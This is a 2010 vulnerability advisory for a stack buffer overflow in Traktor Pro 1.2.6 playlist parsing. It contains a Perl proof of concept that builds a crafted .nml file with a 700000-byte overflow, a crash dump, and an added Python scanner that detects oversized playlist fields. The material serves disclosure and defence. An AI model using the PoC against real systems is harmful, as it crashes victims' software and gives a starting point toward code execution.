Native Instruments Traktor Pro 1.2.6 Stack-based Buffer Overflow Vulnerability

Date: 20 Nov 2010
Reported by: Gjoko Krstic
Type: zeroscience
Source: www.zeroscience.mk

Native Instruments Traktor Pro 1.2.6 buffer overflow vulnerability in playlist file parsing, leading to system crash and potential arbitrary code execution

Code
```perl
#!/usr/local/bin/perl
#
#
# Native Instruments Traktor Pro 1.2.6 Stack-based Buffer Overflow Vulnerability
#
#
# Vendor: Native Instruments GmbH
# Product web page: http://www.native-instruments.com
# Affected version: 1.2.6.8491 (Standalone)
#
# Summary: TRAKTOR PRO is the new benchmark in DJ software. Mix digital files
# on four decks, using the high-quality internal mixer or external hardware,
# and the best effects suite around. Fully primed for professional use, TRAKTOR
# PRO redefines the art of DJing.
#
# Desc: Traktor Pro suffers from a stack buffer overflow vulnerability when
# parsing playlist files (.nml) resulting in a crash. The user input is not
# properly sanitized which may give the attackers the possibility for an
# arbitrary code execution on the affected system. Failure of exploitation
# may result in a denial of service.
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
#
# -------------------------------------------------------------------
#
# (4418.4608): Stack overflow - code c00000fd (first/second chance not available)
# eax=14250000 ebx=001cc168 ecx=00000007 edx=7c90e514 esi=001cc140 edi=001cc198
# eip=7c90e514 esp=0ff5e4e4 ebp=0ff5e4f4 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll - 
# ntdll!KiFastSystemCallRet:
# 7c90e514 c3              ret
#
# -------------------------------------------------------------------
#
#
# Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
#
# Zero Science Lab - http://www.zeroscience.mk
#
# Advisory ID: ZSL-2010-4977
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4977.php
#
# 09.11.2010
#


use strict;
use warnings;

print qq{

-------------------------------------------------------------------------
|                                                                       |
|         Native Instruments Traktor 1.2.6 Stack Overflow PoC           |
|                                                                       |
|                 Copyleft (c) 2010, Zero Science Lab                   |
|                                                                       |
-------------------------------------------------------------------------
};

# 700000 bytes of 'A' (0x41): the oversized run that overflows the stack
# buffer when Traktor parses the playlist.
my $bof = "\x41" x 700000;

# Playlist prefix, up to and including the start tag of the second <entry>.
my $start = '<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<nml version="14">
<musicfolders></musicfolders>
<collection entries="2"><entry artist="Paulseq" audio_id="AGYAAjFQQiQFFCFAQSMVBCIwUDISBBXf/rhv/6/609/979uF//v/nD3/zf24X/+v+tPf/N/bhf/6/61Z/839uG//r/rE3/zf24b/+v+tTf/t/ahv/6/6xN/939uF//r/rUn/3f25b+/P+dTf79/Llv79/51M//38qV//3/nU3//vy5b+/v+dTf79/Llv/8/51N//39qW//3/rUz//f2pX/+/+tTP/9/blv/8/61M//782W/vv/nUz+/fy5b9/v+dTP78/alf/9/51M/v38uW/v7/rUz+/fypX//P+cS/7s/qlP/6/61L/9z+qU//r/nEv/y/6WP/x/94Ru7CEAAAAA==" modified_date="2008/11/18" modified_time="46610" title="Demo 1"><location dir="/:" file="Demo 1.mp3" volume=""></location>
<info bitrate="193000" coverartid="063\5RHVNTDZ5QGUQCJSQT2SAIRKVFNA" filesize="2488" flags="2" import_date="2008/11/18" last_played="2008/11/5" playcount="6" playtime="101" ranking="0"></info>
<tempo bpm="126.200249" bpm_quality="100"></tempo>
<loudness peak_db="-0.766197324" perceived_db="0.94946605"></loudness>
<cue_v2 displ_order="0" hotcue="0" len="0" name="AutoGrid" repeats="-1" start="671.08913429252357" type="4"></cue_v2>
<cue_v2 displ_order="0" hotcue="1" len="1901.7395166612771" name="n.n." repeats="-1" start="66299.022459106593" type="5"></cue_v2>
</entry>
<entry audio_id="AE0AAAbzv4bJPNhuR+po5a51uDzHXUbaeMKuhYdnVl+H3Inln6bba9hvhtt55o62yWvpbnjreseflslr2G5n+4rWnobaa9duZ/tpxZ+12WzIf3fq37Wepuhs2X1n22vGnpXXa7d+Z/t71q2m+my3fWj6a8autth+6I536mu3rYXXfciPaPptxnRk+K63jWr7bbjeluietp1r+Vy3zqbmnsmve/ltp92m14/HnHvabbjehueep6x762yY7Zf4lVWcbOpup9yWx6+3z3vpXJjbh9evprx82W6o3If3r6a7fPpdiOyI6K+lzHzZXYfth+avptyIZ01BAAAAAAAAAAAAAA==" modified_date="2008/9/9" modified_time="56472" my="" title="Demo 2">';

# Remainder of the playlist, starting with the second entry's <location> child.
my $end = '<location dir="/:" file="Demo 2.mp3" volume=""></location>
<info bitrate="194000" coverartid="006\GEUNGXABSHRWRDW2UGHKAKQUYRVD" filesize="1903" import_date="2008/9/9" playcount="6" playtime="76" ranking="0"></info>
<tempo bpm="119" bpm_quality="100"></tempo>
<loudness peak_db="-0.257283062" perceived_db="3.40946603"></loudness>
<cue_v2 displ_order="0" hotcue="2" len="0" name="AutoGrid" repeats="-1" start="797.66281512605042" type="4"></cue_v2>
<cue_v2 displ_order="0" hotcue="0" len="0" name="Beginning" repeats="-1" start="797.66281512605042" type="0"></cue_v2>
<cue_v2 displ_order="0" hotcue="1" len="2016.8067226890755" name="Loop1" repeats="-1" start="41133.797268907569" type="5"></cue_v2>
</entry>
</collection>
<playlists><node name="$ROOT" type="FOLDER"><subnodes count="3"><node name="Demo Tracks" type="PLAYLIST"><playlist entries="2" type="LIST"><entry><primarykey key="/:Demo 2.mp3" type="TRACK"></primarykey>
</entry>
<entry><primarykey key="/:Demo 1.mp3" type="TRACK"></primarykey>
</entry>
</playlist>
</node>
<node name="Preparation" type="PLAYLIST"><playlist entries="0" type="LIST"></playlist>
</node>
<node name="_RECORDINGS" type="PLAYLIST"><playlist entries="0" type="LIST"></playlist>
</node>
</subnodes>
</node>
</playlists>
</nml>';

my $file = "PoC.nml";
print "\n\n[*] Creating $file playlist file...\n";
# Three-argument open with 'or' so a failed open actually dies
# (the two-argument "..." || die form never reaches die).
open(my $nml, '>', "./$file") or die "\nCan't open $file: $!";
# The oversized run is written as character data directly inside the
# second <entry>, between its start tag and its <location> child.
print $nml $start . $bof . $end;
print "\n[.] File successfully buffered!\n\n";
close $nml;
```
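A defender-side check for the malformed layout this PoC produces, added here as an example and not part of the original advisory or the Zero Science PoC. It walks an .nml document with Python's standard xml.etree and flags any attribute value or character-data run longer than a threshold; the threshold (MAX_FIELD_LEN) and the minimal sample playlist are constructed assumptions. The PoC places its 700000-byte run as text inside the second <entry>, not in an attribute, so the scan covers both.

```python
"""Length scanner for Traktor .nml playlists (added example, not the
advisory's own code). Flags oversized attribute values and text runs."""
import xml.etree.ElementTree as ET

# Constructed threshold: real titles, paths and audio_id blobs in the
# advisory's sample playlist are all well under this, while the PoC's
# padding is 700000 bytes, so a modest cap separates the two cleanly.
MAX_FIELD_LEN = 4096


def scan_nml(xml_text, max_len=MAX_FIELD_LEN):
    """Return [(tag, field, length)] for every attribute value or
    character-data run longer than max_len. 'field' is the attribute
    name, or 'text'/'tail' for character data around the element."""
    findings = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        for name, value in elem.attrib.items():
            if len(value) > max_len:
                findings.append((elem.tag, name, len(value)))
        # The PoC's padding sits directly inside <entry>, before its
        # first child, so an attribute-only check would miss it.
        for kind in ("text", "tail"):
            data = getattr(elem, kind)
            if data is not None and len(data.strip()) > max_len:
                findings.append((elem.tag, kind, len(data.strip())))
    return findings


def build_sample(padding):
    """Constructed minimal playlist mirroring the PoC's layout: the
    padding goes between the entry's start tag and its <location>."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<nml version="14"><collection entries="1">'
        '<entry title="Demo 2">' + padding +
        '<location dir="/:" file="Demo 2.mp3" volume=""></location>'
        '</entry></collection></nml>'
    )


BENIGN = build_sample("")
OVERSIZED = build_sample("A" * 700000)  # same size as the PoC's $bof

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(label, scan_nml(doc))
```

Run it over playlists received from untrusted sources before they are opened in an affected client; a non-empty result is a reason to quarantine the file.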
